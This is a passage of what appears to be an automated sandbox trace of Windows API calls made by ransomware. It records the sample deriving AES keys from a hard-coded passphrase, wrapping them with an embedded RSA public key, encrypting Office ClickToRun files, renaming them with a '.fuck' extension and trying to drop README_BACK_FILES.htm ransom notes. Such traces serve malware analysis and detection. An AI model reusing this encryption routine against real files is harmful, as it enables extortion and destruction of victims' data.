lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.774] CloseHandle (hObject=0xffffffff) returned 1 [0238.774] CloseHandle (hObject=0xffffffff) returned 1 [0238.774] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0238.775] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0238.775] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0238.776] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0238.777] CryptDestroyHash (hHash=0x282e178) returned 1 [0238.777] CryptDestroyKey (hKey=0x282e338) returned 1 [0238.777] CryptReleaseContext (hProv=0x2880c98, dwFlags=0x0) returned 1 [0238.777] FindNextFileA (in: hFindFile=0x282e0f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.777] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.777] GetLastError () returned 0x5 [0238.777] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash")) returned 0x20 [0238.777] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0238.778] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.778] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.779] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0238.779] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x287fb98) returned 1 [0238.782] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.782] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.782] CryptHashData (hHash=0x282e338, pbData=0x2856f70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.782] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e338, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e3f8) returned 1 [0238.782] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.782] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.782] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2880da8) returned 1 [0238.782] CryptImportPublicKeyInfo (in: hCryptProv=0x2880da8, dwCertEncodingType=0x1, pInfo=0x286bf68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286bf98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286bfa0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e178) returned 1 [0238.782] CryptEncrypt (in: hKey=0x282e178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.783] CryptEncrypt (in: hKey=0x282e178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880c98*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2880c98*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.783] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2880c98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.783] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.783] CryptEncrypt (in: hKey=0x282e3f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.783] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.783] CloseHandle (hObject=0xffffffff) returned 1 [0238.783] CloseHandle (hObject=0xffffffff) returned 1 [0238.783] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0238.784] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0238.784] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.gsg")) returned 0 [0238.785] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.fuck")) returned 0 [0238.785] CryptDestroyHash (hHash=0x282e338) returned 1 [0238.785] CryptDestroyKey (hKey=0x282e3f8) returned 1 [0238.785] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.785] FindNextFileA (in: hFindFile=0x282e0f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.785] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.785] GetLastError () returned 0x5 [0238.785] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0238.786] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0238.786] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.786] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.787] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0238.787] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2881408) returned 1 [0238.790] CryptCreateHash (in: hProv=0x2881408, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.790] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.790] CryptHashData (hHash=0x282dfb8, pbData=0x2885020, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.790] CryptDeriveKey (in: hProv=0x2881408, Algid=0x6610, hBaseData=0x282dfb8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e238) returned 1 [0238.790] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.790] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.790] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2881738) returned 1 [0238.791] CryptImportPublicKeyInfo (in: hCryptProv=0x2881738, dwCertEncodingType=0x1, pInfo=0x286c858*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c888*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c890*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e338) returned 1 [0238.791] CryptEncrypt (in: hKey=0x282e338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.791] CryptEncrypt (in: hKey=0x282e338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881848*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2881848*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.791] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881848, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.791] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.791] CryptEncrypt (in: hKey=0x282e238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.791] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.791] CloseHandle (hObject=0xffffffff) returned 1 [0238.791] CloseHandle (hObject=0xffffffff) returned 1 [0238.791] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0238.792] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0238.793] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0238.793] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0238.794] CryptDestroyHash (hHash=0x282dfb8) returned 1 [0238.794] CryptDestroyKey (hKey=0x282e238) returned 1 [0238.794] CryptReleaseContext (hProv=0x2881408, dwFlags=0x0) returned 1 [0238.794] FindNextFileA (in: hFindFile=0x282e0f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0238.794] FindClose (in: hFindFile=0x282e0f8 | out: hFindFile=0x282e0f8) returned 1 [0238.794] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0238.794] AreFileApisANSI () returned 1 [0238.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 110 [0238.794] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.795] GetLastError () returned 0x5 [0238.795] GetLastError () returned 0x5 [0238.795] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.795] FindClose (in: hFindFile=0x282deb8 | out: hFindFile=0x282deb8) returned 1 [0238.795] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\readme_back_files.htm")) returned 0xffffffff [0238.795] AreFileApisANSI () returned 1 [0238.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0238.795] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.796] GetLastError () returned 0x5 [0238.796] GetLastError () returned 0x5 [0238.796] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.796] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282deb8 [0238.796] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.796] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.796] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x282e3f8 [0238.798] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.798] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.798] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.798] GetLastError () returned 0x5 [0238.798] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0238.798] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0238.799] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.799] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.800] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.800] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2880eb8) returned 1 [0238.803] CryptCreateHash (in: hProv=0x2880eb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.803] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.803] CryptHashData (hHash=0x282e0f8, pbData=0x2884c10, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.803] CryptDeriveKey (in: hProv=0x2880eb8, Algid=0x6610, hBaseData=0x282e0f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e438) returned 1 [0238.803] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.803] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.803] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2881050) returned 1 [0238.804] CryptImportPublicKeyInfo (in: hCryptProv=0x2881050, dwCertEncodingType=0x1, pInfo=0x286c038*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c068*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c070*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e478) returned 1 [0238.804] CryptEncrypt (in: hKey=0x282e478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.804] CryptEncrypt (in: hKey=0x282e478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880d20*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2880d20*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.804] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2880d20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.804] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.804] CryptEncrypt (in: hKey=0x282e438, hHash=0x0, Final=1, dwFlags=0x0, 